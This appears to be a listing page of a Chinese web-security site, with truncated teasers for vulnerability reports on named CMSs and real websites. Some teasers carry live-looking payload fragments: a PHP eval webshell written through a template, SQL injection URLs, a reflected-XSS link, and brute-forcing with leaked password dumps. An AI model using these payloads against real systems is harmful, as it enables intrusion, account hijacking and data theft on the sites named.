无忧购物系统ASP专业版POST 注入漏洞 - 网站安全关注热度:14

漏洞文件：views.asp先用穿山甲GET注入，然后用POST注入。修复方案：严格过滤..[详情]

桔子酒店储存型xss 可劫持管理员 - 网站安全 - 自关注热度:12

储存型xss，可获得管理的cookies。详细说明：在会员登陆后有个社区管理，里面有我的投诉，可选择酒店进行投诉。投诉相当于留言板，可插入恶意代码。造成储存型xss。由此可以钓到指..[详情]

TL-WR340G无线路由器拒绝服务漏洞 - 网站安全 - 自关注热度:17

TL-WR340G是TP-Link出品的一款轻量级无线路由器，近日有国外黑客发现了这款路由器上的一个拒绝服务漏洞，只要发送一个简单的畸形包到路由器，便可使路由器停止工作，需要手动重启路..[详情]

Magic Quotes禁用危机 - 网站安全 - 自学php关注热度:17

PHP中的魔术引号相信很多人都不陌生了，之前被认为是防御SQL注入以及XSS的一个方法。但是PHP官方决定移除这一特性，理由是因为这一特性对于安全的提升帮助不大，并且十分影响PHP执..[详情]

Web安全性测试之XSS - 网站安全 - 自学php关注热度:17

XSS 全称(Cross Site Scripting) 跨站脚本攻击， 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时，脚本就会在用户的浏览器上执行，从而达到..[详情]

Javascript中XSS的过滤 - 网站安全 - 自学php关注热度:21

对于XSS的过滤，在很多网站中都是说，要过滤双引号，要过滤掉尖括号，这样就安全了。难道真的过滤了双引号和尖括号就完全安全了？在导入到Javascript中的变量中，XSS是有非常多方法..[详情]

虎扑体育网csrf - 网站安全 - 自学php关注热度:37

Web服务器对发送来的请求没有验证来源，就很容易出现csrf攻击。csrf的相关介绍见易踪网的另一篇文章：www.2cto.com/Article/201209/156432.html，由于目标网站没有对发送到服务器的请求做来源验..[详情]

DedeEIMS v1.1暴后台路径 - 网站安全 - 自学php关注热度:15

\include\dialog\config.php//检验用户登录状态$cuserLogin = new userLogin();if($cuserLogin-getUserID()==-1){if($cuserLogin-adminDir==#39;#39;){exit(#39;Request Error!#39;);}$gurl = ../......[详情]

AKCMS后台拿Webshell及修复 - 网站安全 - 自学php关注热度:30

模板中写入以下内{php}fputs(fopen(./0x80c.php,w),?eval(\$_POST[0x80c]);?){/php}然后管理员密码可以注入获取http://www.2cto.com /akcms_keyword.php?sid=11111%27and%28select%201%20from%28select%2.....[详情]

[图解漏洞]解跨站请求伪造（CSRF）原理（之二）关注热度:21

继[图解漏洞]图解跨站请求伪造（CSRF）原理，再整理了一幅图说明CSRF的原理。CSRFCS=Cross Site,跨站，从b.com发起RF=Request Forgery，利用已经验证的a.com的cookie，从b.com向a.com中的某个页面perf..[详情]

HDwiki新漏洞补丁包2012-08-09发现后门代码 - 网站安关注热度:17

HDwiki各版本新漏洞补丁包2012-08-09发现后门代码详细说明：在看补丁包中的reference.php 文件时， 首行并发现了如下不明之处：?php/**词条编辑页面的参考资料*/require_once(dirname(__FILE__)./../j..[详情]

联想移动竞价采购管理系统沦陷 - 网站安全 - 自关注热度:18

很多原因导致站点沦陷的哦！1.站点是这个啦，移动竞价采购管理系统，虽然不知道是什么，但是看起来很牛B的样子http://rat.lenovomobile.com2.管理员密码弱口令啊，直接cs1/cs1登录了，这个..[详情]

phpcms v9 商务中心两个xss - 网站安全 - 自学php关注热度:16

前台菜单没有过滤直接可以写脚本漏洞证明：第二个：..[详情]

猎头网XSS+绕过帐号只能一台电脑登陆限制 - 网站关注热度:10

无意在微博上看到这么一个网站，lietou.com，然后就。。。详细说明：猎头网注册的时候会填入一些公司信息，比如：目前公司，目前职位等，这个地方不用盲打，注册时向这个地方写入..[详情]

漂流瓶：飘来的可能是局长，也可能是XSS - 网站关注热度:85

一只漂流瓶向你飘了过来。。它飘来的可能是对美好生活的向往，可能是对世俗的抱怨，可能是某局长发来的某某某，它，还有可能是XSS！。漂流瓶，作为一项个人认为是娱乐的功能，..[详情]

phpmyadmin导出shell至中文路径 - 网站安全 - 自学p关注热度:21

1 set character_set_client=#39;gbk#39;;2 set character_set_connection=#39;gbk#39;;3 set character_set_database=#39;gbk#39;;4 set character_set_results=#39;gbk#39;;5 set character.....[详情]

探测网站(四)burp suite暴力猜解密码 - 网站安全关注热度:146

burp suite的intruder模块用来自动探测Web应用程序，我们可以用它来暴力猜解用户名和密码。首先准备用户名和密码字典，这个网上可以用csdn、天涯、人人等泄露的用户名和密码，也可以用..[详情]

网易某分站存在验证缺陷可引发短信DDOS - 网站安关注热度:100

早上一来，看了下邮件，就点到**那块去了。可谁知点着点着就发现了这个。刚好有段时间没来wooyun露面了，就提交到wooyun去吧。详细说明：早上一来，看了下邮件，就点到彩票那块去了..[详情]

艺龙旅行网某站任意密码修改 - 网站安全 - 自学关注热度:19

1、自己注册一个号，搞定邮箱验证2、用自己的号找回密码3、【漏洞的原因：最后向服务器提交修改后的密码时，未验证，直接提交卡号+新密码】所以，到最后一步提交的时候，开fid..[详情]

Btoo网店系统sql注射 - 网站安全 - 自学php关注热度:19

未对提交的参数进行过滤详细说明：product\fir_cla.asp help\help.asp这两个文件eg:http://localhost:80/help/help.asp?id=1http://www.2cto.com /product/fir_cla.asp?flag=1pro_claid=1表名chinammc_adm.....[详情]

人人网日志功能存储型XSS - 网站安全 - 自学php关注热度:48

大致流程如下：1. 首先，我们发表一个正常的日志，添加视频/音频，因为想试试能不能直接调用外部FLASH，因此输入http://xsst.sinaapp.com/Xss.swf#.mp3进行测试2. 发布成功后，我们可以看到出..[详情]

人人网某处存储型XSS - 网站安全 - 自学php关注热度:18

欢迎人人网回来，特发此洞！某处一个存储型的XSS，看了就中，还会同步到新鲜事~~客服妹子太聪明，居然跨不了她。。。目测木有设置HTTPONLY，获取COOKIES后轻松入侵~~目测还有红包？嘿..[详情]

一个反射型xss跨人人网的妹子 - 网站安全 - 自学关注热度:23

屌丝们，行动起来，去跨你们心爱的妹子吧~详细说明：1.随便找个反射型xss：http://app.renren.com/search?selected=3app_ref=searchorigin=603keyword=scriptalert(/xss/)/script2.弄成短地址发给妹子，.....[详情]

dz7.2&1.5后台拿shell[无ucenter非创始人] - 网站安关注热度:20

这是在没有ucenter和manyou插件漏洞并且不是创始人的情况下的.6.0和7.0就不说了. 直接开始吧,先说7.2.在那篇文章最后说#39;如果你愿意,可以使用base64_encode(serialize($a))的方法试试7.2获取Webs..[详情]

phpdisk老漏洞新用法以及后台拿SHELL办法 - 网站安关注热度:23

以前暴出过通杀0DAY代码如下/api/datacall.php?type=userlimit=1order=1 and(select 1 from(select count(*),concat((select (select (select concat(0times;27,0x7e,pd_users.username,0times;27,0x.....[详情]

浅谈MySQL导出一句话木马拿WebShell的方法-只需要一关注热度:21

昨天看一篇文章中说到MySQL导出一句话木马拿WebShell的方法。 文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行)： Drop TABLE IF EXISTS temp; //如果存在temp就删掉 Create....[详情]

李白白之权限测试案例分析 - 网站安全 - 自学关注热度:13

上图是２０１０年以来网易产品被第三方机构发现的安全测试漏洞统计图，其中离我们最近的季度２０１２－３季度出现的安全测试漏洞为２４个，平均每个月都保持在２０个以上。上..[详情]

分享一点waf绕过技巧 - 网站安全 - 自学php关注热度:34

越来越多的服务器会加入waf.如何bypass:waf 适合代码层是分离的，也就是说它不是专门定制的，他防范也就是通用型的注入或者跨站。以一个案例为主：碰到这么一个服务器，他有个页面..[详情]

Discuz! X2.5类似鸡肋存储Xss - 网站安全 - 自学php关注热度:16

貌似鸡肋,因为要造成XSS是需要有一定的权限，比如论坛的斑竹什么的，普通会员的话好像不行，因为存在XSS的地方是一个转账功能，而在此转账功能下面还有一个留言框，而造成XSS的就..[详情]

对居然之家的一次内网渗透 - 网站安全 - 自学p关注热度:48

先上图：本来是不想搞站的，专心学点编程，可是老是有人来找我帮忙什么的。。。搞完这个我想专心学点编程，俗话说不会编程的黑客不算是高富帅。。。所以说，你懂得。进入正题..[详情]